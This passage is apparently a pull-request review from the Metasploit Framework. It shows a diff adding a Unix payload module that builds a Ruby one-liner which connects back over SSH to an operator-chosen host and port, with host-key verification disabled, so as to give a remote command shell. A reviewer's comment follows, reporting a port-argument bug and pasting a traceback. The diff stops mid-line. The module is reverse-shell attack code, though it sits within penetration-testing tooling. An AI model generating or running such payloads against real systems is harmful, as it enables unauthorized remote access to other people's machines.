modules/payloads/singles/cmd/unix/reverse_ruby_ssh.rb

```diff
@@ -0,0 +1,53 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_ssh'
+require 'msf/base/sessions/ssh_command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP SSH (via Ruby)',
+      'Description' => 'Connect back and create a command shell via Ruby, uses SSH',
+      'Author'      => 'RageLtMan <rageltman[at]sempervictus>',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseSsh,
+      'Session'     => Msf::Sessions::SshCommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'ruby',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+    register_advanced_options(
+      [
+        Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork", true ])
+      ]
+    )
+  end
+
+  def generate
+    vprint_good(command_string)
+    return super + command_string
+  end
+
+  def command_string
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+    frk   = datastore['PrependFork'] ? 'exit if fork;' : ''
+    res = "ruby -rnet/ssh -e '#{frk}Net::SSH.start(\"#{lhost}\",#{datastore['LPORT']},paranoid:false)"
```

Comment:
I think you need to tag the port in a hash, rather than pass it as another parameter.
Also, even after that fix, when I run it, I get:
```
tmoose@ubuntu:~/rapid7/metasploit-framework$ ./cmd-unix-reverse_ruby_ssh 
[ruby-2.6.2@metasploit-framework]((HEAD detached at upstream/pr/12002)) tmoose@ubuntu:~/rapid7/metasploit-framework$ {:port=>4567, :paranoid=>false}@127.0.0.1's password:Traceback (most recent call last):
	8: from -e:1:in `<main>'
	7: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh.rb:250:in `start'
	6: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/authentication/session.rb:71:in `authenticate'
	5: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/authentication/session.rb:71:in `each'
	4: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/authentication/session.rb:85:in `block in authenticate'
	3: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/authentication/methods/password.rb:21:in `authenticate'
	2: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/authentication/methods/password.rb:68:in `ask_password'
	1: from /home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/prompt.rb:45:in `ask'
/home/tmoose/.rvm/gems/ruby-2.6.2@metasploit-framework/gems/net-ssh-5.2.0/lib/net/ssh/prompt.rb:45:in `noecho': Input/output error (Errno::EIO)
```